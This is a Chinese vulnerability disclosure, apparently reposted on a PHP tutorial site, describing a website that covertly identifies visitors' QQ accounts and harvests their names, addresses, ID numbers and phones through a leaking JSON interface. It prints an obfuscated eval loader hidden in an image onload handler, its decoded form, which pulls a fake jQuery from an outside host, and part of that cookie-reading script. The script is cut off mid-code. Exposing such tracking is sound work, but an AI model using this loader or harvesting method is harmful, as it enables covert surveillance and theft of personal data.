来源:自学PHP网 时间:2015-04-16 23:15 作者: 阅读:次
[导读] 用户访问网站,能获取用户的QQ号码,然后进一步的获取用户姓名,地址,身份证号码,电话等信息 网站地址:http: qq ycddm cn qq 该站引入了一个JS文件,是加载soso的缓存页面,该页面插入了一张图片...
用户访问网站,能获取用户的QQ号码,然后进一步的获取用户姓名,地址,身份证号码,电话等信息.网站地址:http://qq.ycddm.cn/qq/ x2({"retcode":0,"result":"{\"code\":0,\"msg\":\"succ\",\"result\":{\"uin\":QQ号码,\"type\":0,\"name\":\"\\姓名\",\"website\":\"http:\\/\\/网址\",\"mail\":\"邮箱帐号\",\"date\":1306675077,\"addr\":\"地址\",\"contact\":\"\",\"tel\":\"电话\",\"id_card\":\"身份证号码\",\"province_id\":\"-1\",\"city_id\":\"-1\",\"id_card_type\":\"1\",\"dev_check_state\":0,\"idcard_current_state\":\"0\",\"authfile_current_state\":0,\"waitcheck_name\":\"\名字\",\"waitcheck_id_card\":\"身份证号码\",\"waitcheck_mail\":\"邮箱地址\",\"waitcheck_dev_type\":\"0\",\"waitcheck_id_card_type\":null}}"});
<!doctype html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="Generator" content="EditPlus®"> <meta name="Author" content=""> <meta name="Keywords" content=""> <meta name="Description" content=""> <title>Document</title> </head> <body> <img src=http://www.2cto.com/uploadfile/2014/0627/20140627094445163.jpg" onload="/*wvXbbHSXTBEcpHyTwt*/var/*tKLisTFzPwe*/WVTm/*ncdCgvaIeWDqr*/=/*KxujnvTMrqnmY*/\u0053\u0074\u0072\u0069\u006e\u0067./*XGMDNJyB_H*/\u0066\u0072\u006f\u006d\u0043\u0068\u0061\u0072\u0043\u006f\u0064\u0065;/*ohkBBmSqErtRCUg*/var/*ccWEpinFPHAgN*/gWIRUKM_/*vfSjuCYPPphtgbus*/=/*pLRTAcCAuSNFbB*/\u0065\u0076\u0061\u006c;gWIRUKM_(WVTm(118,97,114,32,72,61,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,72,69,65,68,39,41,46,105,116,101,109,40,48,41,59,118,97,114,32,83,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,83,46,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,59,83,46,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,113,113,102,97,110,103,107,101,46,99,111,109,47,106,115,47,115,107,105,110,47,106,113,117,101,114,121,45,49,46,49,48,46,50,46,109,105,110,46,106,115,34,59,72,46,97,112,112,101,110,100,67,104,105,108,100,40,83,41,59));"> </body> </html>
var H=document.getElementsByTagName('HEAD').item(0);var S= document.createElement("script");S.type="text/javascript";S.src="http://www.qqfangke.com/js/skin/jquery-1.10.2.min.js";H.appendChild(S); 一个伪装的jquery function g(n) { var a, r = new RegExp("(^| )"+n+"=([^;]*)(;|$)"); if (a = document.cookie.match(r)) return unescape(a[2]); else return "" } function Request(argname) { var url = document.location.href; var arrStr = url.substring(url.indexOf("?")+1).split("&"); for(var i =0;i 修复方案: 建议及时清理此json漏洞. |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com